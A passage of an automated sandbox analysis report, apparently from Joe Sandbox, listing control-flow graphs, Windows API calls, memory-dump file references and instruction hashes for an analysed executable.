                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: dg$hi
                                                                                                                                                                                                        • API String ID: 0-2859417413
                                                                                                                                                                                                        • Opcode ID: dab238be4ac1e733ee5fa6abda45cfa4476f70120622ec2e01413f482a26810a
                                                                                                                                                                                                        • Instruction ID: 19e6bb5c7048884144116ab898b250add8874a3883647d038a697ef71514d765
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dab238be4ac1e733ee5fa6abda45cfa4476f70120622ec2e01413f482a26810a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62F19571618301EFE704DF28D892B2ABBF6FB9A344F14892CF5959B2A1C734D845CB12

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 455 55d110-55d11b call 594cc0 458 55d121-55d130 call 58c8d0 455->458 459 55d2ee-55d2f6 ExitProcess 455->459 463 55d136-55d15f 458->463 464 55d2e9 call 5956e0 458->464 468 55d196-55d1bf 463->468 469 55d161 463->469 464->459 470 55d1f6-55d20c 468->470 471 55d1c1 468->471 472 55d170-55d194 call 55d300 469->472 474 55d20e-55d20f 470->474 475 55d239-55d23b 470->475 473 55d1d0-55d1f4 call 55d370 471->473 472->468 473->470 478 55d210-55d237 call 55d3e0 474->478 479 55d286-55d2aa 475->479 480 55d23d-55d25a 475->480 478->475 482 55d2d6-55d2dd call 55e8f0 479->482 483 55d2ac-55d2af 479->483 480->479 486 55d25c-55d25f 480->486 482->464 495 55d2df call 562f10 482->495 487 55d2b0-55d2d4 call 55d490 483->487 490 55d260-55d284 call 55d440 486->490 487->482 490->479 498 55d2e4 call 560b40 495->498 498->464
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 0055D2F1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                        • Opcode ID: 01c3ae2bec3eaecfd3b13d745d97520d0c95ca4649ab42a8742ca70ddaaffefb
                                                                                                                                                                                                        • Instruction ID: c6bef12489cb9b3ec1125007d40725248c1969bfd61ffb6060ca1df58c811bea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01c3ae2bec3eaecfd3b13d745d97520d0c95ca4649ab42a8742ca70ddaaffefb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F41347540D340ABD721BB68D5A8A2EFFF5AF92706F048C0DE9C497212C236D8588B67

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 500 595700-595714 501 595729-59574a 500->501 502 59571b-595722 500->502 503 59578c-595795 call 5931a0 500->503 504 5957b0 500->504 505 5957b2 500->505 506 595797-5957a5 call 593220 500->506 510 59574c-59574f 501->510 511 595776-59578a RtlReAllocateHeap 501->511 502->501 502->504 502->505 502->506 509 5957b4-5957b9 503->509 504->505 505->509 506->504 514 595750-595774 call 595b30 510->514 511->509 514->511
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00595784
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                        • Opcode ID: c1f8d88e7074127caff3dd93dfb0c30b473aad852589662f2a0395268541f46e
                                                                                                                                                                                                        • Instruction ID: c365c13b28050915c3b17d26ada0b11eab7f020f3da4c5f7c080bab1acd30a1f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1f8d88e7074127caff3dd93dfb0c30b473aad852589662f2a0395268541f46e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B119E7591C240EBC702AF68E845A1BBFF5EF96710F058828F4C59B222D335D925DBA2

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 534 595bb0-595be2 LdrInitializeThunk
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0059973D,005C003F,00000006,?,?,00000018,8C8D8A8B,?,?), ref: 00595BDE
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                        • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
